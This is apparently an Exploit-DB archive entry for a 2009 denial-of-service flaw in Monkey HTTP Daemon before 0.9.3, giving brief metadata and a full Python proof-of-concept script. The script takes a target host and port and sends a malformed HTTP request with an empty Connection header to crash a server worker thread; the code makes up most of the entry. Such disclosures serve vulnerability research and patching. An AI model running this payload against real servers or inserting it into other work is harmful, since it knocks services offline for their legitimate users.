Monkey HTTP Daemon < 0.9.3 - Denial of Service

Author: Patroklos Argyroudis
type: dos
platform: linux
port: 80.0
date_added: 2009-12-15 
date_updated: 2009-12-16 
verified: 0 
codes: OSVDB-60534 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commonkey-0.9.2.tar.gz

#Monkey HTTP Daemon is prone to a denial-of-service vulnerability.

#Remote attackers can exploit this issue to cause the application to crash, denying service to legitimate users.

#Versions prior to Monkey HTTP Daemon 0.9.3 are vulnerable.

#!/usr/bin/env python
# monkeyex.py -- Patroklos Argyroudis, argp at domain census-labs.com
#
# Denial of service exploit for Monkey web server version <= 0.9.2:
#
# http://census-labs.com/news/2009/12/14/monkey-httpd/

import os
import sys
import socket

GET = "GET / "

def main(argv):
    argc = len(argv)

    if argc != 3:
        print "usage: %s <host> <port>" % (argv[0])
        sys.exit(0)

    host = argv[1]
    port = int(argv[2])

    print "[*] target: %s:%d" % (host, port)

    payload = GET
    payload += "HTTP/1.1\r\nConnection:\n\r\n\r\n";

    print "[*] payload: %s" % (payload)

    sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sd.connect((host, port))

    print "[*] attempting to crash one Monkey worker thread.."
    sd.send(payload)
    sd.close()

if __name__ == "__main__":
    main(sys.argv)
    sys.exit(0)

# EOF